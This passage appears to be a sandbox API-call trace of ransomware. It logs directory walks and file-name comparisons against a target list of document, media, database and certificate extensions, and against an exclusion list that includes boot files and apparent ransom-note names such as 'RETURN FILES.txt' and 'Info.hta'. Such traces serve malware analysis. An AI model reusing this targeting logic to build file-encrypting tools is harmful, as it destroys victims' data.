4 [0036.262] lstrcmpiW (lpString1=".mde", lpString2=".png") returned -1 [0036.262] lstrlenW (lpString=".mdf") returned 4 [0036.262] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0036.495] lstrlenW (lpString=".mdw") returned 4 [0036.495] lstrcmpiW (lpString1=".mdw", lpString2=".png") returned -1 [0036.495] lstrlenW (lpString=".mef") returned 4 [0036.495] lstrcmpiW (lpString1=".mef", lpString2=".png") returned -1 [0036.495] lstrlenW (lpString=".mft") returned 4 [0036.495] lstrcmpiW (lpString1=".mft", lpString2=".png") returned -1 [0036.495] lstrlenW (lpString=".mfw") returned 4 [0036.495] lstrcmpiW (lpString1=".mfw", lpString2=".png") returned -1 [0036.495] lstrlenW (lpString=".mht") returned 4 [0036.495] lstrcmpiW (lpString1=".mht", lpString2=".png") returned -1 [0036.495] lstrlenW (lpString=".mhtml") returned 6 [0036.496] lstrcmpiW (lpString1=".mhtml", lpString2="on.png") returned -1 [0036.496] lstrlenW (lpString=".mka") returned 4 [0036.496] lstrcmpiW (lpString1=".mka", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mkidx") returned 6 [0036.496] lstrcmpiW (lpString1=".mkidx", lpString2="on.png") returned -1 [0036.496] lstrlenW (lpString=".mkv") returned 4 [0036.496] lstrcmpiW (lpString1=".mkv", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mos") returned 4 [0036.496] lstrcmpiW (lpString1=".mos", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mov") returned 4 [0036.496] lstrcmpiW (lpString1=".mov", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mp3") returned 4 [0036.496] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mp4") returned 4 [0036.496] lstrcmpiW (lpString1=".mp4", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mpeg") returned 5 [0036.496] lstrcmpiW (lpString1=".mpeg", lpString2="n.png") returned -1 [0036.496] lstrlenW (lpString=".mpg") returned 4 [0036.496] lstrcmpiW (lpString1=".mpg", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mpv") returned 4 [0036.496] lstrcmpiW (lpString1=".mpv", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mrw") returned 4 [0036.496] lstrcmpiW (lpString1=".mrw", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".msg") returned 4 [0036.496] lstrcmpiW (lpString1=".msg", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".mxl") returned 4 [0036.496] lstrcmpiW (lpString1=".mxl", lpString2=".png") returned -1 [0036.496] lstrlenW (lpString=".myd") returned 4 [0036.496] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".myi") returned 4 [0036.497] lstrcmpiW (lpString1=".myi", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".nef") returned 4 [0036.497] lstrcmpiW (lpString1=".nef", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".nrw") returned 4 [0036.497] lstrcmpiW (lpString1=".nrw", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".obj") returned 4 [0036.497] lstrcmpiW (lpString1=".obj", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".odb") returned 4 [0036.497] lstrcmpiW (lpString1=".odb", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".odc") returned 4 [0036.497] lstrcmpiW (lpString1=".odc", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".odm") returned 4 [0036.497] lstrcmpiW (lpString1=".odm", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".odp") returned 4 [0036.497] lstrcmpiW (lpString1=".odp", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".ods") returned 4 [0036.497] lstrcmpiW (lpString1=".ods", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".oft") returned 4 [0036.497] lstrcmpiW (lpString1=".oft", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".one") returned 4 [0036.497] lstrcmpiW (lpString1=".one", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".onepkg") returned 7 [0036.497] lstrcmpiW (lpString1=".onepkg", lpString2="con.png") returned -1 [0036.497] lstrlenW (lpString=".onetoc2") returned 8 [0036.497] lstrcmpiW (lpString1=".onetoc2", lpString2="Icon.png") returned -1 [0036.497] lstrlenW (lpString=".opt") returned 4 [0036.497] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".oqy") returned 4 [0036.497] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".orf") returned 4 [0036.497] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".p12") returned 4 [0036.497] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0036.497] lstrlenW (lpString=".p7b") returned 4 [0036.497] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".p7c") returned 4 [0036.498] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pam") returned 4 [0036.498] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pbm") returned 4 [0036.498] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pct") returned 4 [0036.498] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pcx") returned 4 [0036.498] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pdd") returned 4 [0036.498] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pdf") returned 4 [0036.498] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pdp") returned 4 [0036.498] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pef") returned 4 [0036.498] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pem") returned 4 [0036.498] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pff") returned 4 [0036.498] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pfm") returned 4 [0036.498] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pfx") returned 4 [0036.498] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".pgm") returned 4 [0036.498] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".php") returned 4 [0036.498] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0036.498] lstrlenW (lpString=".php3") returned 5 [0036.498] lstrcmpiW (lpString1=".php3", lpString2="n.png") returned -1 [0036.498] lstrlenW (lpString=".php4") returned 5 [0036.498] lstrcmpiW (lpString1=".php4", lpString2="n.png") returned -1 [0036.498] lstrlenW (lpString=".php5") returned 5 [0036.498] lstrcmpiW (lpString1=".php5", lpString2="n.png") returned -1 [0036.498] lstrlenW (lpString=".phtml") returned 6 [0036.499] lstrcmpiW (lpString1=".phtml", lpString2="on.png") returned -1 [0036.499] lstrlenW (lpString=".pict") returned 5 [0036.499] lstrcmpiW (lpString1=".pict", lpString2="n.png") returned -1 [0036.499] lstrlenW (lpString=".pl") returned 3 [0036.499] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0036.499] lstrlenW (lpString=".pls") returned 4 [0036.499] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0036.499] lstrlenW (lpString=".pm") returned 3 [0036.499] lstrcmpiW (lpString1=".pm", lpString2="png") returned -1 [0036.499] lstrlenW (lpString=".png") returned 4 [0036.499] lstrcmpiW (lpString1=".png", lpString2=".png") returned 0 [0036.499] lstrlenW (lpString="TitleButtonIcon.png") returned 19 [0036.499] lstrlenW (lpString=".dqb") returned 4 [0036.499] lstrcmpiW (lpString1=".dqb", lpString2=".png") returned -1 [0036.499] lstrlenW (lpString="TitleButtonIcon.png") returned 19 [0036.499] lstrcmpiW (lpString1="boot.ini", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="bootfont.bin", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="ntldr", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="ntdetect.com", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="io.sys", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="Info.hta", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrcmpiW (lpString1="ivttvf.exe", lpString2="TitleButtonIcon.png") returned -1 [0036.499] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0036.499] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="TitleButtonSubpicture.png", cAlternateFileName="")) returned 1 [0036.499] lstrlenW (lpString="TitleButtonSubpicture.png") returned 25 [0036.499] lstrlenW (lpString=".1cd") returned 4 [0036.499] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0036.499] lstrlenW (lpString=".3ds") returned 4 [0036.499] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0036.499] lstrlenW (lpString=".3fr") returned 4 [0036.499] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0036.499] lstrlenW (lpString=".3g2") returned 4 [0036.500] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".3gp") returned 4 [0036.500] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".7z") returned 3 [0036.500] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0036.500] lstrlenW (lpString=".accda") returned 6 [0036.500] lstrcmpiW (lpString1=".accda", lpString2="re.png") returned -1 [0036.500] lstrlenW (lpString=".accdb") returned 6 [0036.500] lstrcmpiW (lpString1=".accdb", lpString2="re.png") returned -1 [0036.500] lstrlenW (lpString=".accdc") returned 6 [0036.500] lstrcmpiW (lpString1=".accdc", lpString2="re.png") returned -1 [0036.500] lstrlenW (lpString=".accde") returned 6 [0036.500] lstrcmpiW (lpString1=".accde", lpString2="re.png") returned -1 [0036.500] lstrlenW (lpString=".accdt") returned 6 [0036.500] lstrcmpiW (lpString1=".accdt", lpString2="re.png") returned -1 [0036.500] lstrlenW (lpString=".accdw") returned 6 [0036.500] lstrcmpiW (lpString1=".accdw", lpString2="re.png") returned -1 [0036.500] lstrlenW (lpString=".adb") returned 4 [0036.500] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".adp") returned 4 [0036.500] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".ai") returned 3 [0036.500] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0036.500] lstrlenW (lpString=".ai3") returned 4 [0036.500] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".ai4") returned 4 [0036.500] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".ai5") returned 4 [0036.500] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".ai6") returned 4 [0036.500] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0036.500] lstrlenW (lpString=".ai7") returned 4 [0052.782] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.783] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0052.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar") returned 139 [0052.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.783] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.783] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.783] lstrlenW (lpString="messages.json") returned 13 [0052.783] lstrlenW (lpString=".1cd") returned 4 [0052.783] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.783] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.783] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.783] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0052.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg") returned 139 [0052.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.784] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.784] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.784] lstrlenW (lpString="messages.json") returned 13 [0052.784] lstrlenW (lpString=".1cd") returned 4 [0052.784] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.784] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.784] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.784] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0052.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca") returned 139 [0052.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.784] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x851f1e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.784] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.784] lstrlenW (lpString="messages.json") returned 13 [0052.785] lstrlenW (lpString=".1cd") returned 4 [0052.785] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x851f1e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.785] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.785] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.785] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0052.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs") returned 139 [0052.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.785] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.785] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.785] lstrlenW (lpString="messages.json") returned 13 [0052.785] lstrlenW (lpString=".1cd") returned 4 [0052.785] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.785] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.785] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.785] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", 